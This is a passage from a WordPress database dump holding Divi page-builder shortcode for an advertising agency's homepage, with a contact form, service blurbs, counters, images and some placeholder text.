button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-06 20:56:10','2020-07-06 20:56:10','',134,'https://52.66.212.87/2020/07/06/134-revision-v1/',0,'revision','',0),(256,1,'2020-07-06 20:59:36','2020-07-06 20:59:36','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency.An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" 